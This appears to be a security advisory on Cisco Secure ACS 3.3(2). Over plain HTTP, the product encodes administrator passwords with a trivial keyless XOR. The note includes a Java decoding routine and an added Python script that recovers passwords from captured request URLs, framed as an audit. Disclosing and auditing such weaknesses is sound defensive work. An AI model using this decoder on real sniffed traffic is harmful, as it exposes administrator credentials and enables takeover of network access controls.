Cisco ACS Encoding research


Research Notes:
--------------
Product: Cisco Secure ACS Release 3.3(2) Build 2 
Company: Cisco
Website: www.cisco.com
Vendor aware: Cisco recommends using the SSL feature
Author: Francisco Amato

Without SSL, the Cisco ACS web administration interface uses a simple method to encrypt sensitive information (such as passwords)
that is sent between client and server when an administrator adds a new account.

If an attacker sniffs the traffic between client and server, it is very simple to decrypt the information.

Example:

This is the POST used to create a new administrator account:
http://acs-server.com:xxx/setup.exe?action=add_new_administrator&ACCOUNT_NAME_FIELD=pepe&PasswordEnc=1&ACCOUNT_PASSWORD=umvv&ConfirmEnc=1&ACCOUNT_CONFIRM=umvv

The ACCOUNT_CONFIRM and ACCOUNT_PASSWORD parameters contain the "encrypted" password.

Using the following Java function (Decrypt), we can decrypt/encrypt the password:

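    // XORs each byte with a value derived only from its position;
    // the same call therefore both encodes and decodes.
    public String Decrypt(String s)
    {
        StringBuffer stringbuffer = new StringBuffer();
        if(s != null)
        {
            byte abyte0[] = s.getBytes();
            // int index bounded by the array length: a byte counter
            // overflows on inputs longer than 127 bytes
            for(int i = 0; i < abyte0.length; i++)
                stringbuffer.append((char)intXOR(abyte0[i], (byte)i));
        }
        return stringbuffer.toString();
    }

    private byte intXOR(byte byte0, byte byte1)
    {
        // byte0 = ASCII value of the character
        // byte1 = position of the character in the string
        byte byte2 = (byte)(((byte1 + 3) * 7) % 10);
        byte byte3 = (byte)(byte0 ^ byte2);
        return byte3;
    }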
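
An added example, not part of the original notes and not Cisco's code: a Python port of the routine above, used to audit captured request URLs for ACS administrator passwords that crossed the network without SSL. The function names are assumptions, the sample requests are constructed from the URL shown on this page, and passwords are assumed to be ASCII.

```python
from urllib.parse import urlsplit, parse_qs

def keystream(n):
    """Per-position XOR byte, as in intXOR above: ((i + 3) * 7) % 10. No key is involved."""
    return [((i + 3) * 7) % 10 for i in range(n)]

def transform(value):
    """XOR each character with its position byte; the same call encodes and decodes."""
    return "".join(chr(ord(c) ^ k) for c, k in zip(value, keystream(len(value))))

def audit_request(url):
    """Return a finding if the URL carries an encoded ACS password over plain HTTP, else None."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "http":
        return None  # SSL enabled: the parameter is not exposed on the wire
    query = parse_qs(parts.query, keep_blank_values=True)
    if query.get("PasswordEnc") != ["1"] or "ACCOUNT_PASSWORD" not in query:
        return None
    encoded = query["ACCOUNT_PASSWORD"][0]
    return {
        "host": parts.netloc,
        "account": query.get("ACCOUNT_NAME_FIELD", [""])[0],
        "encoded": encoded,
        "recovered": transform(encoded),  # proves the value is equivalent to cleartext
    }

def audit(requests):
    """Run audit_request over an iterable of URLs and keep only the findings."""
    return [f for f in map(audit_request, requests) if f is not None]

# Constructed sample input: the request from this page, the same request
# over SSL, and an unrelated request.
_QUERY = ("action=add_new_administrator&ACCOUNT_NAME_FIELD=pepe&PasswordEnc=1"
          "&ACCOUNT_PASSWORD=umvv&ConfirmEnc=1&ACCOUNT_CONFIRM=umvv")
SAMPLE_REQUESTS = [
    "http://acs-server.com:xxx/setup.exe?" + _QUERY,
    "https://acs-server.com:xxx/setup.exe?" + _QUERY,
    "http://acs-server.com:xxx/index.html",
]

if __name__ == "__main__":
    for f in audit(SAMPLE_REQUESTS):
        print("exposed admin credential: host=%(host)s account=%(account)s "
              "encoded=%(encoded)s recovered=%(recovered)s" % f)
```

Every keystream byte is below 10, so only the low four bits of each character change, and the character at index 7 (keystream byte 0) is sent unmodified. Any account flagged by this audit should have its password changed after SSL is enabled.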
